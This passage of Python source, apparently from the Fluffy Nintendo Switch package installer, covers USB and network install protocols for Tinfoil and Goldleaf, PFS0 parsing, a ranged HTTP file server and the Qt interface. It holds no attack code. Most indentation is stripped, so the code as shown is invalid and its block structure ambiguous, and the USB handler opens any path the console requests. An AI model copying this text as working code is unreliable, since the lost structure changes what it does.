l_github.setStyleSheet("QLabel { color: rgba(255, 255, 255, 50%) }")
pixmap = QPixmap(dinlaypixmap)
screen = app.primaryScreen()
if screen.size().width() <= 2560:
if screen.size().width() <= 1920:
if screen.size().width() <= 1366:
lowresfix = pixmap.scaled(230, 200, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
else:
lowresfix = pixmap.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
else:
lowresfix = pixmap.scaled(350, 240, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
else:
img_label.setPixmap(pixmap)
else:
dark_mode = 1
pixmap = QPixmap(inlaypixmap)
screen = app.primaryScreen()
app.setStyleSheet("")
l_github.setStyleSheet("QLabel { color: rgba(0, 0, 0, 50%) }")
if screen.size().width() <= 2560:
if screen.size().width() <= 1920:
if screen.size().width() <= 1366:
lowresfix = pixmap.scaled(230, 200, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
else:
lowresfix = pixmap.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
else:
lowresfix = pixmap.scaled(350, 240, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
else:
img_label.setPixmap(pixmap)
def turn_off_logging():
global is_logging
is_logging = False
def set_nca_name(v):
global cur_nca_name
cur_nca_name = v
def set_start_time():
global start_time
start_time = time.time()
def set_cur_transfer_rate(v):
global cur_transfer_rate
cur_transfer_rate = v
def set_sent_header():
global sent_header
sent_header = True
def set_last_transfer_rate(v):
global last_transfer_rate
last_transfer_rate = v
def close_program():
global is_exiting
try:
configp = configparser.ConfigParser()
configp['DEFAULT'] = {'switch_ip': switch_ip,
'language': language,
'dark_mode': dark_mode}
with open(initial_dir + '/fluffy.conf', 'w') as cfgfile:
configp.write(cfgfile)
except:
pass
is_exiting = True
sys.exit()
def set_transfer_rate(v):
global transfer_rate
transfer_rate = TransferRateDict[v]
def set_dir(d):
global selected_dir
selected_dir = d
def set_selected_files(f):
global selected_files
selected_files = f
def set_progress(c, e):
global cur_progress
global end_progress
end_progress = e
cur_progress = c
def set_cur_nsp(nsp):
global cur_nsp_name
global cur_nsp_count
if cur_nsp_name != nsp:
if cur_nsp_name == "NA":
cur_nsp_name = nsp
else:
cur_nsp_count += 1
cur_nsp_name = nsp
set_start_time()
last_progress = 0
def set_total_nsp(n):
global total_nsp
total_nsp = n
def complete_install():
global is_done
is_done = True
def reset_install():
global is_installing
global sent_header
global is_done
global cur_progress
global end_progress
global cur_nsp_name
global cur_nca_name
global cur_transfer_rate
global last_transfer_rate
global max_nca_count
global selected_files
global selected_dir
global total_nsp
    global cur_nsp_count
    global cur_nca_count
list_nsp.clear()
btn_header.setEnabled(True)
btn_nsp.setEnabled(True)
combo.setEnabled(True)
txt_ip.setEnabled(True)
txt_ip2.setEnabled(True)
net_radio.setEnabled(True)
usb_radio.setEnabled(True)
txt_port.setEnabled(True)
tin_radio.setEnabled(True)
gold_radio.setEnabled(True)
l_nsp.setText("")
l_nsp.setStyleSheet("")
l_switch.setText("")
l_switch.setStyleSheet("")
l_status.setStyleSheet("")
progressbar.setValue(0)
cur_nsp_count = 1
total_nsp = 0
selected_files = None
selected_dir = None
cur_nca_count = 0
max_nca_count = 0
cur_nsp_name = "NA"
cur_nca_name = "NA"
cur_transfer_rate = 0
last_transfer_rate = 0
is_done = False
is_installing = False
sent_header = False
cur_progress = 0
end_progress = 100
init_language()
window.menuBar().setEnabled(True)
if is_network:
net_radio_cmd()
else:
usb_radio_cmd()
def throw_error(_type):
global last_error
if _type == 0:
last_error = Language.CurrentDict[17] # Goldleaf
elif _type == 1:
last_error = Language.CurrentDict[19] # Network
elif _type == 2:
last_error = Language.CurrentDict[18] # Tinfoil
def reset_last_error():
global last_error
last_error = "NA"
def complete_loading():
global is_installing
is_installing = True
def set_network(v):
global is_network
is_network = v
def set_ip(v, n):
global switch_ip
global host_ip
if n == 0:
switch_ip = v
else:
host_ip = v
def set_port(v):
global net_port
net_port = int(v)
def set_nca_count(c, m):
global cur_nca_count
global max_nca_count
cur_nca_count = c
max_nca_count = m
def set_goldleaf(v):
global is_goldleaf
is_goldleaf = v
# PFS0 & Goldleaf by fourminute.
class PFS0:
magic = None
total_files = None
string_table = None
header_remainder = None
body_length = None
file_array = []
f = None
file_names = []
@staticmethod
def reset():
PFS0.magic = None
PFS0.total_files = None
PFS0.string_table = None
PFS0.header_remainder = None
PFS0.body_length = None
PFS0.file_array = []
PFS0.f = None
PFS0.file_names = []
@staticmethod
def open(fn):
PFS0.f = open(fn, 'rb')
PFS0.f.seek(0)
PFS0.magic = PFS0.f.read(4).decode()
if PFS0.magic != 'PFS0':
print("PFS0 didn't check out. Possible NSP corruption.")
PFS0.total_files = struct.unpack("<I",PFS0.f.read(4))[0]
PFS0.header_remainder = struct.unpack("<I",PFS0.f.read(4))[0]
PFS0.string_table = 0x10 + 0x18 * PFS0.total_files
PFS0.f.read(4)
PFS0.file_array = []
for i in range(PFS0.total_files):
nca_offset = struct.unpack("<Q",PFS0.f.read(8))[0]
nca_size = struct.unpack("<Q",PFS0.f.read(8))[0]
name_offset= struct.unpack("<I",PFS0.f.read(4))[0]
PFS0.file_array.append((nca_offset,nca_size,name_offset))
PFS0.f.read(4)
PFS0.body_length = PFS0.f.tell() + PFS0.header_remainder
for i in range(PFS0.total_files):
PFS0.f.seek(PFS0.string_table+PFS0.file_array[i][2])
fn = b''
while True:
b = PFS0.f.read(1)
if b == b'\x00': break
fn += b
PFS0.file_names.append(fn.decode())
@staticmethod
def read_chunks(index):
global transfer_rate
global last_transfer_rate
chunk_size = transfer_rate
abs_sz = int(PFS0.file_array[index][1])
abs_off = int(PFS0.body_length+PFS0.file_array[index][0])
PFS0.f.seek(abs_off)
end = abs_off + abs_sz
while True:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
to_read = end - PFS0.f.tell()
if to_read < chunk_size:
yield PFS0.f.read(to_read)
break
else:
yield PFS0.f.read(chunk_size)
set_progress(int(PFS0.f.tell()), abs_sz)
elapsed_time = time.time() - start_time
if elapsed_time >= 1:
set_cur_transfer_rate(int(PFS0.f.tell()) - last_transfer_rate)
set_last_transfer_rate(int(PFS0.f.tell()))
set_start_time()
@staticmethod
def read_nca(index):
PFS0.f.seek(PFS0.body_length+PFS0.file_array[index][0])
return PFS0.f.read(PFS0.file_array[index][1])
class CommandId:
ConnectionRequest = 0
ConnectionResponse= 1
NSPName= 2
Start= 3
NSPData= 4
NSPContent= 5
NSPTicket= 6
Finish= 7
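# Goldleaf USB ("GLUC") flow, as implemented below: every command is an
# 8-byte packet of (u32 magic 0x43554C47, u32 command id), little-endian.
# The host sends ConnectionRequest, then serves the console's requests:
# NSPName (u32 length + name), NSPData (per-file name/absolute-offset/size
# records taken from the PFS0 header), NSPContent (raw chunks of the file
# at the requested index), NSPTicket (the .tik entry), and Finish.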
class Goldleaf:
GLUC = 0x43554c47
magic = 0x43554c47
ticket_index = 0
cmd_id = 0
nsp_path = ""
@staticmethod
def reset():
Goldleaf.GLUC = 0x43554c47
Goldleaf.magic = 0x43554c47
Goldleaf.ticket_index = 0
Goldleaf.cmd_id = 0
Goldleaf.nsp_path = ""
@staticmethod
def write(buffer):
gold_out.write(buffer)
@staticmethod
def magic_ok():
return Goldleaf.GLUC == Goldleaf.magic
@staticmethod
def is_id(a_cmd):
return a_cmd == Goldleaf.cmd_id
@staticmethod
def read(length):
return gold_in.read(length).tobytes()
@staticmethod
def read_cmd(data):
Goldleaf.magic,Goldleaf.cmd_id = struct.unpack("<II",data)
@staticmethod
def write_cmd(a_cmd):
packed = struct.pack("<II",Goldleaf.magic,a_cmd)
gold_out.write(bytes(packed))
@staticmethod
def Goldleaf_USB():
Goldleaf.write_cmd(CommandId.ConnectionRequest)
while True:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
try:
Goldleaf.read_cmd(Goldleaf.read(8))
if Goldleaf.is_id(CommandId.ConnectionResponse) and Goldleaf.magic_ok():
Goldleaf.write_cmd(CommandId.NSPName)
base_name = os.path.basename(Goldleaf.nsp_path)
Goldleaf.write(struct.pack("<I",len(base_name)))
Goldleaf.write(base_name.encode())
elif Goldleaf.is_id(CommandId.Start) and Goldleaf.magic_ok():
Goldleaf.write_cmd(CommandId.NSPData)
PFS0.open(Goldleaf.nsp_path)
Goldleaf.write(struct.pack("<I",len(PFS0.file_array)))
for i in range(len(PFS0.file_array)):
Goldleaf.write(struct.pack("<I",len(PFS0.file_names[i])))
Goldleaf.write(PFS0.file_names[i].encode())
Goldleaf.write(struct.pack("<Q",PFS0.body_length+PFS0.file_array[i][0]))
Goldleaf.write(struct.pack("<Q",PFS0.file_array[i][1]))
if '.tik' in PFS0.file_names[i].lower():
Goldleaf.ticket_index = i
complete_loading()
elif Goldleaf.is_id(CommandId.NSPContent) and Goldleaf.magic_ok():
index = struct.unpack("<I", Goldleaf.read(4))[0]
try:
set_nca_name(PFS0.file_names[index])
set_nca_count(index+1, len(PFS0.file_array))
except:
pass
for buffer in PFS0.read_chunks(index):
while True:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
try:
Goldleaf.write(buffer)
break
except:
pass
elif Goldleaf.is_id(CommandId.NSPTicket) and Goldleaf.magic_ok():
while True:
try:
Goldleaf.write(PFS0.read_nca(Goldleaf.ticket_index))
break
except:
pass
elif Goldleaf.is_id(CommandId.Finish) and Goldleaf.magic_ok():
set_progress(100,100)
complete_install()
sys.exit()
except:
pass
return 0
def init_goldleaf_usb_install():
global gold_in
global gold_out
Goldleaf.reset()
PFS0.reset()
for file in selected_files:
try:
dev = usb.core.find(idVendor=0x057E, idProduct=0x3000)
dev.reset()
dev.set_configuration()
cfg = dev.get_active_configuration()
is_out_ep = lambda ep: usb.util.endpoint_direction(ep.bEndpointAddress) == usb.util.ENDPOINT_OUT
is_in_ep = lambda ep: usb.util.endpoint_direction(ep.bEndpointAddress) == usb.util.ENDPOINT_IN
gold_out = usb.util.find_descriptor(cfg[(0,0)], custom_match=is_out_ep)
gold_in = usb.util.find_descriptor(cfg[(0,0)], custom_match=is_in_ep)
assert gold_out is not None
assert gold_in is not None
set_cur_nsp(os.path.basename(file))
Goldleaf.nsp_path = str(file)
Goldleaf.Goldleaf_USB()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
throw_error(0)
try:
usb.util.dispose_resources(dev)
dev.reset()
except:
pass
sys.exit()
usb.util.dispose_resources(dev)
dev.reset()
sys.exit()
# Tinfoil Network
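# Tinfoil network install, as implemented below: the host serves the
# selected NSPs over HTTP with Range support (the console fetches each file
# in pieces), then pushes a newline-separated URL list to the console on
# TCP port 2000, length-prefixed with a big-endian u32.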
netrlist = []
def reset_netrlist():
global netrlist
netrlist = None
netrlist = []
def append_netrlist(v, v2):
global netrlist
netrlist.append((v, v2))
class RangeHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_head(self):
for s in range(len(netrlist)):
if netrlist[s][0] == str(self.path)[1:]:
path = netrlist[s][1]
ctype = self.guess_type(path)
if os.path.isdir(path):
return SimpleHTTPRequestHandler.send_head(self)
if not os.path.exists(path):
return self.send_error(404, self.responses.get(404)[0])
f = open(path, 'rb')
fs = os.fstat(f.fileno())
size = fs[6]
start, end = 0, size - 1
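                # Range header forms handled here: "bytes=start-end",
                # "bytes=start-" (read to EOF) and "bytes=-suffix"
                # (last N bytes, mapped to start = size - suffix).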
if 'Range' in self.headers:
start, end = self.headers.get('Range').strip().strip('bytes=')\
.split('-')
if start == "":
try:
end = int(end)
except ValueError as e:
self.send_error(400, 'invalid range')
start = size - end
else:
try:
start = int(start)
except ValueError as e:
self.send_error(400, 'invalid range')
if start >= size:
self.send_error(416, self.responses.get(416)[0])
if end == "":
end = size - 1
else:
try:
end = int(end)
except ValueError as e:
self.send_error(400, 'invalid range')
start = max(start, 0)
end = min(end, size - 1)
self.range = (start, end)
cont_length = end - start + 1
if 'Range' in self.headers:
self.send_response(206)
else:
self.send_response(200)
self.send_header('Content-type', ctype)
self.send_header('Accept-Ranges', 'bytes')
self.send_header('Content-Range',
'bytes %s-%s/%s' % (start, end, size))
self.send_header('Content-Length', str(cont_length))
self.send_header('Last-Modified', self.date_time_string(fs.st_mtime))
self.end_headers()
return f
def copyfile(self, infile, outfile):
if 'Range' not in self.headers:
SimpleHTTPRequestHandler.copyfile(self, infile, outfile)
return
complete_loading()
set_cur_nsp(str(os.path.basename(infile.name)))
start, end = self.range
infile.seek(start)
bufsize = 64 * 1024 # 64KB
while True:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
buf = infile.read(bufsize)
if not buf:
break
try:
outfile.write(buf)
try:
set_progress(int(infile.tell()), int(end))
elapsed_time = time.time() - start_time
if elapsed_time >= 1:
set_cur_transfer_rate(int(infile.tell()) - last_transfer_rate)
set_last_transfer_rate(int(infile.tell()))
set_start_time()
except:
pass
except BrokenPipeError:
pass
class MyServer(TCPServer):
stopped = False
def server_bind(self):
import socket
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def serve_forever(self):
while not self.stopped:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
self.handle_request()
def force_stop(self):
self.server_close()
self.stopped = True
sys.exit()
def init_tinfoil_net_install():
reset_netrlist()
    accepted_extension = '.nsp'
hostPort = random.randint(26490,26999)
target_ip = switch_ip
hostIp = host_ip
target_path = str(selected_dir).strip()
baseUrl = hostIp + ':' + str(hostPort) + '/'
directory = target_path
file_list_payload = ''
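    # Each selected NSP is advertised under a random "<n>.nsp" alias;
    # netrlist maps each alias back to the real path when the console
    # requests it over HTTP.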
for file in [file for file in next(os.walk(target_path))[2] if file.endswith(accepted_extension)]:
for y in selected_files:
if str(file).find(os.path.basename(y)) != -1:
n = random.randint(1,10000000)
fake_file = str(n) + ".nsp"
append_netrlist(fake_file, str(y))
file_list_payload += baseUrl + fake_file + '\n'
file_list_payloadBytes = file_list_payload.encode('ascii')
if directory and directory != '.':
os.chdir(directory)
server = MyServer((host_ip, hostPort), RangeHTTPRequestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.start()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, 2000))
sock.sendall(struct.pack('!L', len(file_list_payloadBytes)) + file_list_payloadBytes)
while len(sock.recv(1)) < 1:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
sock.close()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
server.force_stop()
throw_error(1)
sys.exit(1)
complete_install()
server.force_stop()
try:
server.shutdown()
except:
pass
sys.exit()
# Tinfoil USB
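# Tinfoil USB protocol, as implemented below: commands travel in 0x20-byte
# headers of (magic "TUC0", u8 type, 3 pad bytes, u32 command id at 0x08,
# u64 data size at 0x0C, 0xC pad bytes). The host first sends a "TUL0"
# packet carrying the newline-separated NSP path list, then answers
# FILE_RANGE requests (u64 size, u64 offset, u64 name length, name) until
# the console sends EXIT.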
class Tinfoil:
@staticmethod
def send_response_header(out_ep, cmd_id, data_size):
out_ep.write(b'TUC0')
out_ep.write(struct.pack('<B', CMD_TYPE_RESPONSE))
out_ep.write(b'\x00' * 3)
out_ep.write(struct.pack('<I', cmd_id))
out_ep.write(struct.pack('<Q', data_size))
out_ep.write(b'\x00' * 0xC)
@staticmethod
def file_range_cmd(nsp_dir, in_ep, out_ep, data_size):
file_range_header = in_ep.read(0x20)
range_size = struct.unpack('<Q', file_range_header[:8])[0]
range_offset = struct.unpack('<Q', file_range_header[8:16])[0]
nsp_name_len = struct.unpack('<Q', file_range_header[16:24])[0]
nsp_name = bytes(in_ep.read(nsp_name_len)).decode('utf-8')
set_cur_nsp(str(os.path.basename(nsp_name)))
Tinfoil.send_response_header(out_ep, CMD_ID_FILE_RANGE, range_size)
with open(nsp_name, 'rb') as f:
complete_loading()
f.seek(range_offset)
curr_off = 0x0
end_off = range_size
read_size = transfer_rate
while curr_off < end_off:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
if curr_off + read_size >= end_off:
read_size = end_off - curr_off
try:
set_progress(int(end_off), int(end_off))
except:
pass
buf = f.read(read_size)
out_ep.write(data=buf, timeout=0)
curr_off += read_size
try:
set_progress(int(curr_off), int(end_off))
elapsed_time = time.time() - start_time
if elapsed_time >= 1:
set_cur_transfer_rate(curr_off - last_transfer_rate)
set_last_transfer_rate(curr_off)
set_start_time()
except:
pass
@staticmethod
def poll_commands(nsp_dir, in_ep, out_ep):
while True:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
cmd_header = bytes(in_ep.read(0x20, timeout=0))
magic = cmd_header[:4]
if magic != b'TUC0':
continue
cmd_type = struct.unpack('<B', cmd_header[4:5])[0]
cmd_id = struct.unpack('<I', cmd_header[8:12])[0]
data_size = struct.unpack('<Q', cmd_header[12:20])[0]
if cmd_id == CMD_ID_EXIT:
complete_install()
sys.exit()
elif cmd_id == CMD_ID_FILE_RANGE:
Tinfoil.file_range_cmd(nsp_dir, in_ep, out_ep, data_size)
@staticmethod
def send_nsp_list(s_f, nsp_dir, out_ep):
nsp_path_list = list()
nsp_path_list_len = 0
for nsp_path in os.listdir(nsp_dir):
if nsp_path.endswith(".nsp"):
for y in s_f:
if str(nsp_path).find(os.path.basename(y)) != -1:
print(str(nsp_path))
nsp_path_list.append(nsp_dir + "/" + nsp_path.__str__() + '\n')
nsp_path_list_len += len(nsp_dir + "/" + nsp_path.__str__()) + 1
out_ep.write(b'TUL0')
out_ep.write(struct.pack('<I', nsp_path_list_len))
out_ep.write(b'\x00' * 0x8)
for nsp_path in nsp_path_list:
            out_ep.write(nsp_path.encode('utf-8'))
def init_tinfoil_usb_install():
try:
nsp_dir = selected_dir
dev = usb.core.find(idVendor=0x057E, idProduct=0x3000)
dev.reset()
dev.set_configuration()
cfg = dev.get_active_configuration()
is_out_ep = lambda ep: usb.util.endpoint_direction(ep.bEndpointAddress) == usb.util.ENDPOINT_OUT
is_in_ep = lambda ep: usb.util.endpoint_direction(ep.bEndpointAddress) == usb.util.ENDPOINT_IN
out_ep = usb.util.find_descriptor(cfg[(0,0)], custom_match=is_out_ep)
in_ep = usb.util.find_descriptor(cfg[(0,0)], custom_match=is_in_ep)
assert out_ep is not None
assert in_ep is not None
Tinfoil.send_nsp_list(selected_files, nsp_dir, out_ep)
Tinfoil.poll_commands(nsp_dir, in_ep, out_ep)
complete_install()
sys.exit()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
throw_error(2)
sys.exit()
pass
# Main
try:
# Images
iconpixmap.loadFromData(base64.b64decode(ICON_DATA))
inlaypixmap.loadFromData(base64.b64decode(DONUT_DATA))
dinlaypixmap.loadFromData(base64.b64decode(DARK_DONUT_DATA))
# Widget Functions
def send_header_cmd():
if not sent_header:
btn_header.setEnabled(False)
btn_nsp.setEnabled(False)
combo.setEnabled(False)
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
net_radio.setEnabled(False)
usb_radio.setEnabled(False)
txt_port.setEnabled(False)
tin_radio.setEnabled(False)
gold_radio.setEnabled(False)
window.menuBar().setEnabled(False)
if combo.currentText() == Language.CurrentDict[5]:
set_transfer_rate(1)
elif combo.currentText() == Language.CurrentDict[6]:
set_transfer_rate(0)
if is_network:
set_ip(txt_ip.text(), 0)
set_ip(txt_ip2.text(), 1)
set_port(txt_port.text())
set_sent_header()
set_start_time()
threading.Thread(target = init_tinfoil_net_install).start()
else:
if is_goldleaf:
set_sent_header()
set_start_time()
threading.Thread(target = init_goldleaf_usb_install).start()
else:
set_sent_header()
set_start_time()
threading.Thread(target = init_tinfoil_usb_install).start()
else:
reset_install()
def nsp_file_dialog():
try:
if not is_goldleaf:
d = filedialog.askopenfilenames(parent=root,title=Language.CurrentDict[13],filetypes=[("NSP files", "*.nsp")])
else:
d = filedialog.askopenfilename(parent=root,title=Language.CurrentDict[13],filetypes=[("NSP files", "*.nsp")])
tmp = list()
list_nsp.clear()
i = 0
if not is_goldleaf:
file_list = list(d)
for f in file_list:
if str(f).endswith(".nsp"):
i += 1
list_nsp.addItem(os.path.basename(str(f)))
tmp.append(f)
else:
tmp.append(str(d))
list_nsp.addItem(os.path.basename(str(d)))
i+=1
if i > 0:
btn_header.setEnabled(True)
set_total_nsp(i)
set_dir(os.path.dirname(tmp[0]))
set_selected_files(tmp)
l_status.setText(str(total_nsp) + " " + Language.CurrentDict[14])
else:
btn_header.setEnabled(False)
l_status.setText(Language.CurrentDict[9])
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
pass
def dark_mode_cmd():
if dark_check.isChecked():
try:
set_dark_mode(0)
except:
dark_check.setChecked(False)
pass
else:
set_dark_mode(1)
def tin_radio_cmd():
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
txt_port.setEnabled(False)
net_radio.setChecked(False)
usb_radio.setChecked(True)
net_radio.setVisible(True)
set_goldleaf(False)
split_check.setEnabled(True)
def gold_radio_cmd():
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
txt_port.setEnabled(False)
net_radio.setChecked(False)
usb_radio.setChecked(True)
net_radio.setVisible(False)
set_network(False)
set_goldleaf(True)
        split_check.setChecked(False)
split_check.setEnabled(False)
list_nsp.clear()
def usb_radio_cmd():
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
combo.setEnabled(True)
set_network(False)
txt_port.setEnabled(False)
split_check.setEnabled(True)
def net_radio_cmd():
txt_ip.setEnabled(True)
txt_ip2.setEnabled(True)
combo.setEnabled(False)
set_network(True)
txt_port.setEnabled(True)
        split_check.setChecked(False)
split_check.setEnabled(False)
#Unused
def split_cmd():
if split_check.checkState():
btn_nsp.setText("Select Folder")
else:
btn_nsp.setText("NSP Selection")
def set_done_text():
tmp_string = str(total_nsp)
reset_install()
l_nsp.setText(Language.CurrentDict[8] + " " + tmp_string + " NSP(s)!")
def set_loading_text():
l_nsp.setText("")
l_status.setText("")
l_switch.setText(str(total_nsp) + " " + Language.CurrentDict[26] + ".")
l_switch.setStyleSheet(PURPLE)
def set_progress_text():
        v = (int(cur_progress) / int(end_progress)) * 100
        progressbar.setValue(int(v))
n_rate = round((cur_transfer_rate /1000000),2)
if n_rate < 0:
n_rate = 0.0
if not is_goldleaf:
l_status.setText(Language.CurrentDict[27] + " " + str(cur_nsp_count) + " / " + str(total_nsp) + " NSP(s).")
else:
l_status.setText(Language.CurrentDict[27] + " " + str(cur_nca_count) + " / " + str(max_nca_count) + " NCAs.")
l_switch.setText(Language.CurrentDict[28] + ": " + str(n_rate) + "MB/s.")
l_switch.setStyleSheet(GREEN)
l_status.setStyleSheet(GREEN)
if not is_goldleaf:
if len(cur_nsp_name) > 13:
l_nsp.setText(Language.CurrentDict[7] + ": \"" + cur_nsp_name[:13] + "...\"")
else:
l_nsp.setText(Language.CurrentDict[7] + ": \"" + cur_nsp_name + "\"")
else:
if len(cur_nca_name) > 13:
l_nsp.setText(Language.CurrentDict[29] + ": \"..." + cur_nca_name[-13:] + "\"")
else:
l_nsp.setText(Language.CurrentDict[29] + ": \"" + cur_nca_name + "\"")
def set_switch_text():
dev = usb.core.find(idVendor=0x057E, idProduct=0x3000)
if dev is None:
l_switch.setText(Language.CurrentDict[10]+"!")
btn_header.setEnabled(False)
l_switch.setStyleSheet(RED)
else:
l_switch.setText(Language.CurrentDict[11]+"!")
l_switch.setStyleSheet(GREEN)
if list_nsp.count() > 0:
btn_header.setEnabled(True)
else:
btn_header.setEnabled(False)
#Init Widgets
l_host = QtWidgets.QLabel(Language.CurrentDict[3]+":")
txt_ip2 = QtWidgets.QLineEdit("0.0.0.0")
try:
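        # Find this machine's outbound IP by "connecting" a UDP socket to a
        # public resolver address; UDP connect() sends no packets, it only
        # selects the local interface, which getsockname() then reports.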
fill = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
txt_ip2.setText(str(fill))
except:
pass
l_nsp = QtWidgets.QLabel("")
l_ip = QtWidgets.QLabel(Language.CurrentDict[2]+":")
l_port = QtWidgets.QLabel("Port:")
txt_ip = QtWidgets.QLineEdit("0.0.0.0")
tin_radio = QtWidgets.QRadioButton("Tinfoil")
gold_radio = QtWidgets.QRadioButton("Goldleaf")
split_check = QtWidgets.QCheckBox("Use Split NSP")
dark_check = QtWidgets.QCheckBox(Language.CurrentDict[20])
usb_radio = QtWidgets.QRadioButton("USB")
net_radio = QtWidgets.QRadioButton(Language.CurrentDict[24])
btn_nsp = QtWidgets.QPushButton(Language.CurrentDict[13])
btn_header = QtWidgets.QPushButton(Language.CurrentDict[1])
l_rate = QtWidgets.QLabel(Language.CurrentDict[4])
l_github = QtWidgets.QLabel("v" + VERSION)
l_status = QtWidgets.QLabel(Language.CurrentDict[9]+".")
l_switch = QtWidgets.QLabel(Language.CurrentDict[10]+"!")
list_nsp = QtWidgets.QListWidget()
combo = QComboBox()
#Set Widgets
try:
txt_ip.setText(switch_ip)
except:
txt_ip.setText("0.0.0.0")
pass
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
txt_port = QtWidgets.QLineEdit("2000")
txt_port.setEnabled(False)
h_box = QtWidgets.QHBoxLayout()
h2_box = QtWidgets.QHBoxLayout()
h3_box = QtWidgets.QHBoxLayout()
h3_box.addWidget(dark_check)
h3_box.addStretch()
h3_box.addWidget(l_github)
h_group = QtWidgets.QButtonGroup()
combo.addItem(Language.CurrentDict[6])
combo.addItem(Language.CurrentDict[5])
combo.setCurrentIndex(1)
tin_radio.setChecked(True)
tin_radio.toggled.connect(tin_radio_cmd)
gold_radio.setChecked(False)
gold_radio.toggled.connect(gold_radio_cmd)
h_group.addButton(tin_radio)
h_group.addButton(gold_radio)
h2_box.addWidget(tin_radio)
h2_box.addWidget(gold_radio)
split_check.stateChanged.connect(split_cmd)
dark_check.stateChanged.connect(dark_mode_cmd)
usb_radio.setChecked(True)
usb_radio.toggled.connect(usb_radio_cmd)
h_box.addWidget(usb_radio)
net_radio.toggled.connect(net_radio_cmd)
h_box.addWidget(net_radio)
btn_header.setEnabled(False)
progressbar = QProgressBar()
progressbar.setAlignment(Qt.AlignVCenter)
progressbar.setMaximum(100)
v_box = QtWidgets.QVBoxLayout()
img_label = QLabel()
img_label.setAlignment(Qt.AlignCenter)
# Language Init
def init_language():
l_nsp.setText("")
l_status.setText(Language.CurrentDict[9]+".")
l_switch.setText(Language.CurrentDict[10]+"!")
l_ip.setText(Language.CurrentDict[2]+":")
dark_check.setText(Language.CurrentDict[20])
net_radio.setText(Language.CurrentDict[24])
btn_nsp.setText(Language.CurrentDict[13])
btn_header.setText(Language.CurrentDict[1])
l_rate.setText(Language.CurrentDict[4])
        combo.clear()
        combo.addItem(Language.CurrentDict[5])
        combo.addItem(Language.CurrentDict[6])
        combo.setCurrentIndex(0)
        l_host.setText(Language.CurrentDict[3]+":")
lang_menu.setTitle(Language.CurrentDict[22])
#git_menu.setTitle(Language.CurrentDict[23])
window.setWindowTitle(Language.CurrentDict[0])
# Menu Bar
def lang_menu_cmd():
new_lang = None
ai = 0
for action in lang_menu.actions():
if action.isChecked():
if ai != language:
set_language(ai)
init_language()
ai+=1
lang_menu = window.menuBar().addMenu(Language.CurrentDict[22])
#opt_menu = window.menuBar().addMenu(Language.CurrentDict[21])
#git_menu = window.menuBar().addMenu(Language.CurrentDict[23])
lang_group = QActionGroup(lang_menu)
lang_group.setExclusive(True)
lang_group.addAction(QAction('English',lang_group,checkable=True))
lang_group.addAction(QAction('中文',lang_group,checkable=True))
lang_group.addAction(QAction('Tiếng Việt',lang_group,checkable=True))
lang_group.addAction(QAction('Türkçe',lang_group,checkable=True))
lang_group.addAction(QAction('Português Brasileiro',lang_group,checkable=True))
lang_group.addAction(QAction('Italiano',lang_group,checkable=True))
lang_group.addAction(QAction('Français',lang_group,checkable=True))
lang_group.addAction(QAction('Español',lang_group,checkable=True))
lang_group.addAction(QAction('Deutsch',lang_group,checkable=True))
lang_menu.addActions(lang_group.actions())
lang_group.triggered.connect(lang_menu_cmd)
#opt_menu.triggered.connect(opt_menu_cmd)
#git_menu.triggered.connect(git_menu_cmd)
# Set Language
aix = 0
for action in lang_menu.actions():
if aix == language:
action.setChecked(True)
aix+=1
init_language()
# Occupy VBOX
v_box.addLayout(h2_box)
v_box.addWidget(img_label)
v_box.addStretch()
v_box.addLayout(h_box)
v_box.addWidget(l_ip)
v_box.addWidget(txt_ip)
v_box.addWidget(l_host)
v_box.addWidget(txt_ip2)
#v_box.addWidget(l_port)
#v_box.addWidget(txt_port)
v_box.addWidget(l_rate)
v_box.addWidget(combo)
#v_box.addWidget(split_check)
v_box.addWidget(btn_nsp)
v_box.addWidget(btn_header)
v_box.addWidget(l_nsp)
v_box.addWidget(l_status)
v_box.addWidget(l_switch)
v_box.addWidget(progressbar)
v_box.addWidget(list_nsp)
v_box.addLayout(h3_box)
window.setCentralWidget(QWidget(window))
window.centralWidget().setLayout(v_box)
window.setWindowTitle(Language.CurrentDict[0])
btn_nsp.clicked.connect(nsp_file_dialog)
btn_header.clicked.connect(send_header_cmd)
window.setWindowIcon(QIcon(iconpixmap))
window.show()
# Revert to network mode
if not usb_success:
net_radio_cmd()
net_radio.setChecked(True)
usb_radio.setVisible(False)
l_rate.setVisible(False)
combo.setVisible(False)
gold_radio.setVisible(False)
l_switch.setText(Language.CurrentDict[12])
l_switch.setStyleSheet(BLUE)
if dark_mode == 0:
try:
set_dark_mode(0)
dark_check.setChecked(True)
except:
